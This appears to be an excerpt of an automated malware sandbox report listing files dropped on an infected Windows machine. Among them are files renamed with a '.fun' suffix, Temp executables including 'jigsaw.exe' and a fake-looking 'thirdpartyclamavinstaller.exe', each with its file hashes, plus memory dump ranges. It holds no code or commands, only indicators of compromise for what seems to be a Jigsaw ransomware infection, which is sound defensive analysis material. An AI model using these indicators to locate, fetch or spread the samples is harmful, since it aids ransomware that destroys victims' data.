C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun

Filesize
8KB

MD5
420960c4b17842a24bbf117222c60e47

SHA1
4e2f5bc3a3fe7da4ea60dfaae851b1b88e48751d

SHA256
e94c37d7dc8dd954bfee8e340abc882bc361baf0d3771ed442ed625a3bcb0174

SHA512
b42f16f6fca9b66d49a2ad7c80e56c51e04d023a4ae50e984dbd267e204682ecbb929fefb5c7ee67775597773b08b6bd39416f13b87f1782cf8c5d553ecd7ce5

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{88c63169-aaf0-42db-8bc6-b34a88954cf5}\0.1.filtertrie.intermediate.txt.fun

Filesize
16B

MD5
9817c637ea440822e5d3ff2144d17467

SHA1
84080fede70d3544aad82976cec9b51c83c472ec

SHA256
df1b3b60351e48245d6ac589c68ddf77dba1aa9ba12427405b90daa9143d8252

SHA512
399bd0074e50829c3f5b5000c5e6da863de969adab921b5244da53ae35661ffbc24687176ecc1411f0da78d6a186c999846d454c365500f9833607095a0f2373

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{88c63169-aaf0-42db-8bc6-b34a88954cf5}\0.2.filtertrie.intermediate.txt.fun

Filesize
16B

MD5
2a89b7646b4d795f4bfc5bb4269138e7

SHA1
ff1ffe4b11ab6094419b961bcdc9b923369293bf

SHA256
9dd722337fac6f6363c0697082384f6866d27ad7f5f3d541cb494c91afe14c16

SHA512
4a2cfc5c842227c576b3f93962fa38001db85ae56f5989880e6938c31cc77718b69d94c900cbe150d2126d1952242450981bf2f3f148909b5e056d69579bf3d9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133650075481724226.txt.fun

Filesize
77KB

MD5
93dcf0af3b124f1f5ff28f3cb5c22035

SHA1
72e7a0938314f83b09a316041b52d8b855741aba

SHA256
5406b46de1c051a7712063eaf27209841c8d5ce0d21177d301aafe01fd57bceb

SHA512
13f2de3e0edd73fbcb5e828669099392a415e329a75eefb86c33086d1f6caae2f4dad50e20fe2817969391cc1cd1f26b27cf5f9e3fd321614f70d1cb545c35f4

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133650077594646987.txt.fun

Filesize
47KB

MD5
7e8802439b46ad6a1530de41859f408a

SHA1
6367942d1bc38d128cdba1b7c2dd71679376aa91

SHA256
3dc67f0ffaa26fd2e68261cf237fc248fbb4a4bfdfabe6f7add0fbc05c9b8c23

SHA512
3b07c578c02db0d5c54c6b4f339921ab8ccddbf51bb3b897690ed0216c61198de944544a7a5989f9e8e2218b4292abf86da6671e2cb384003ad2b9bf85ade0e2

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133650083195983942.txt.fun

Filesize
63KB

MD5
cea0914ceb146005302bf16bc2c01ce3

SHA1
a693716368415ac33f22931e2908c8fff5812b4f

SHA256
ad988bc8ac88e46916e761fe53baeb7aa99ce3bd89ffa9635b5f53959c00b2eb

SHA512
1a40dc4f1532c012d2b490e4ae076eebfaccc1d7cff20beb1421cac861d23af2d6b09ddaa98c03432ea5336c8a32d4d09cee848ca68791c0d432ed988e24aa98

Download Submit
C:\Users\Admin\AppData\Local\Temp\a.exe

Filesize
2.4MB

MD5
d948d4b6db5d6d6e2e1ba6c0fa4bf008

SHA1
05846d5b1d37ee2d716140de4f4f984cf1e631d1

SHA256
1f43703d2171ab90e98357b6dfdf824417baa191a59419c27fce42cbafdb7ecf

SHA512
fce681b3721eaf87f27b758782095e34665517ea4e0529cf18b32c4d0d5270ec40c8acf296ad2665e60a6e7e0430807f87e01e3a145902c9fea2a3c83100c15d

Download Submit
C:\Users\Admin\AppData\Local\Temp\b.exe

Filesize
96KB

MD5
ddfe44f87fac7daeeb1b681dea3300e9

SHA1
9a7291fc90f56d8c46cc78397a6f36bb23c60f66

SHA256
951f74882c1873bfe56e0bff225e3cd5d8964af4f7334182bc1bf0ec9e987a0a

SHA512
775a17e879e23262b3102c88218de6c1adde8e3a8c7112937aa63cb159c52e280f30782d5c6925661b0e92c63472345fe1eaa0e354b9a14412fbbd6550b5487f

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.exe

Filesize
44KB

MD5
6d1a47574ef7598017c13d64769cccfb

SHA1
1d75bfb18ffc0b820cb36acf8707343fa6679863

SHA256
d61417d72a054d45ee33e395079e9d674f891a42ed0ec5357b5a8d91c69858a6

SHA512
7e4f90cd9f1c072089d626a51cffb3e89216e2ad5c55ade7b2c2f4f2d8106d5bc2030d2e1f6745cc47bf12180f566c2eb88dc0925f3040eb641e1fb1e6239f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\f.exe

Filesize
3.0MB

MD5
4994952020da28bb0aa023d236a6bf3b

SHA1
af807380a745a4bcf937b87a081ef895ee7f15ba

SHA256
bb8c0e477512adab1db26eb77fe10dadbc5dcbf8e94569061c7199ca4626a420

SHA512
88393499d0816c173ea0b983995833e82e1aac1a73554d0b64d959b69dcf943644ab74927ad576bda48bbdace66256900aab33383f5a0546f6dfe21a8dd5662a

Download Submit
C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

Filesize
60KB

MD5
14a2065165fca7f48b20123ea1ca8d2d

SHA1
f6371909e9b9751d3f7539a75ec0f024cd3094bf

SHA256
cb8068f6f5623b19fea0e5e8657ea059283dc7fbb04ac61c204b8fcf9b09cc3c

SHA512
eadd1e658b19805cc64a8a9a391f42fcae5c410c89b95a1b2e5d8615aadc1e873fb67e214fff5f96163b8340bc37443cfbb4d50eccd2b8e06b6294f503adf103

Download Submit
C:\Users\Admin\AppData\Local\Temp\l.exe

Filesize
334KB

MD5
e00216958f15f1db6371b583a3ea438a

SHA1
4b9e71615b37aea1eaeb5b1cfa0eee048118ff72

SHA256
81e96c07e6c9cb02f72c0943a42ff9f8f09a09c508f8bbaa1142a9ee4f1326cf

SHA512
9d46b4fbf26c775929e95e145b390f0d12566e482920f629b342db2aaa37c5a40a789226ecfe51ba0f0b94fce827b9f53180232cda48bae510cce1e3b37bed16

Download Submit
C:\Users\Admin\AppData\Local\Temp\m.exe

Filesize
1.7MB

MD5
2d4991c3b6da35745e0d4f76dffbca56

SHA1
61340c41787d16b753598670de2cb1dcf50718c5

SHA256
3dacf5cd40090a6d011f1e522eaed2d29699b9d892ce122ea406e0c9d03d5d2d

SHA512
87eb0d4957d81c9ec3be2bf5f032428b4d8e298b8dd70c6a5fc9cd98ad2bb12beb457b32ab698452cb558fdd98e6a78fb081fdf22f63ad0238f0a8ff1092a17f

Download Submit
C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller.exe

Filesize
14KB

MD5
05bd1940ef02d78bc2bd107e81f729f5

SHA1
dd5a4c413464dd21143e98f57484ea979e79d057

SHA256
576e4c14ef11683d332abc303503e257084cfef8ced3072549bdecd0a44bfbe1

SHA512
5967ddaa8eef68883a29de0b470ea101a0c2fb7ba51e7e45ecef1c2f31391993fa9514300c778c1931581b44001f672affb0217333353797742e821e7e885343

Download Submit
C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller0.exe

Filesize
11KB

MD5
c406d8a0b58a59cfacbd41a267cec4bf

SHA1
84f496a9337aa2f8055fcbf5aa77b67d48bd0e21

SHA256
3e3950ea1bd00d98ceb91d7be28beb40772af548d32c9584fa631eda1db01642

SHA512
08a6a905f91faa40a116e071fe153bfd75e43dd47b2d21a56ebad8409102b078f79c854f9d72612d5a9bdc5e5ae9f05324d421334c35fc2402bbe9f9fb47bfa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\z.exe

Filesize
85KB

MD5
0d3da5adb9bb63c7fcb0185756601749

SHA1
72dbd9bc44173033b504dddc655b2082e99cf2b9

SHA256
f31034fffec424d6e4505318400ecc3b00f8c2107c1823510a037b11a49f0741

SHA512
12cb90877e442deb37ca64e911a9d699b3d799e89889f023458bf6f032eb2838b344bddb02cfed82aaae5af84b172d0acd95d84b9db469e2d4cb28586cd30e14

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6A99F7C2-449A-46CA-87FA-BE58EAD049C1} - OProcSessId.dat.fun

Filesize
16B

MD5
cfdae8214d34112dbee6587664059558

SHA1
f649f45d08c46572a9a50476478ddaef7e964353

SHA256
33088cb514406f31e3d96a92c03294121ee9f24e176f7062625c2b36bee7a325

SHA512
c260f2c223ecbf233051ac1d6a1548ad188a2777085e9d43b02da41b291ff258e4c506f99636150847aa24918c7bbb703652fef2fe55b3f50f85b5bd8dd5f6e3

Download Submit
memory/2132-56-0x0000025582150000-0x0000025582166000-memory.dmp

Filesize
88KB

Download
memory/2372-0-0x0000000074F8E000-0x0000000074F8F000-memory.dmp

Filesize
4KB

Download
memory/2372-1-0x0000000000450000-0x0000000000E68000-memory.dmp

Filesize
10.1MB

Download
memory/2372-229-0x0000000074F8E000-0x0000000074F8F000-memory.dmp

Filesize
4KB

Download
memory/2372-2-0x0000000005D00000-0x00000000062A4000-memory.dmp

Filesize
5.6MB

Download
memory/2372-3-0x0000000005850000-0x00000000058E2000-memory.dmp

Filesize
584KB

Download
memory/2372-4-0x0000000005A10000-0x0000000005A1A000-memory.dmp

Filesize
40KB

Download
memory/2372-230-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/2372-5-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/3280-233-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/3280-59-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/3280-296-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/3612-76-0x0000000000BC0000-0x0000000000BE6000-memory.dmp

Filesize
152KB

Download
memory/4604-231-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/4604-17-0x0000000000A30000-0x0000000000A3A000-memory.dmp

Filesize
40KB

Download
memory/4604-232-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/4604-39-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/4604-33-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/4604-295-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/5012-47-0x00007FFA93530000-0x00007FFA93725000-memory.dmp

Filesize
2.0MB

Download